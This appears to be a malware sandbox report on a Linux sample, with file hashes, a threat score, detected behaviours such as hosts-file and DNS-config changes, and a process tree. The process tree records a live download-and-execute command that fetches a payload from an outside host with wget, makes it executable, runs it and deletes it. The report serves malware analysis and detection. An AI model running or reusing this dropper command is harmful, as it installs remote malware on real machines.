Overview

overview

10

Static

static

10

0df9ae3fa9...5ca244

linux_amd64

8

Analysis

  • max time kernel
    17632s
  • max time network
    138s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • submitted
    30-06-2022 18:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0df9ae3fa9f92fd59b7d97a997044da3f59da34e046fcb23a62cbbf3185ca244

  • Size

    101KB

  • MD5

    fac872e84f7741c10a3cc05904f6ca43

  • SHA1

    ed32dd50589c52d407fc0c5b17662141d90b4222

  • SHA256

    0df9ae3fa9f92fd59b7d97a997044da3f59da34e046fcb23a62cbbf3185ca244

  • SHA512

    0c7816c12d720f1ad08d7d4567fcef96085f2e2a892a02af28a62220079d23eb334c2789dba0cbb05c8c3f439c149ca2d75375da815f0958f95e2cd3b3262915

Score
8/10

Malware Config

Signatures

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

Processes

  • ./0df9ae3fa9f92fd59b7d97a997044da3f59da34e046fcb23a62cbbf3185ca244
    ./0df9ae3fa9f92fd59b7d97a997044da3f59da34e046fcb23a62cbbf3185ca244
    1⤵
      PID:592
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      1⤵
        PID:593
        • /usr/bin/wget
          wget -q http://gay.energy/.../vivid -O .....
          2⤵
          • Modifies hosts file
          • Writes DNS configuration
          PID:597
        • /bin/chmod
          chmod 777 .....
          2⤵
            PID:598
          • ./.....
            ./.....
            2⤵
              PID:599
            • /bin/sh
              /bin/sh ./.....
              2⤵
                PID:599
              • /bin/rm
                rm -rf .....
                2⤵
                  PID:601

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads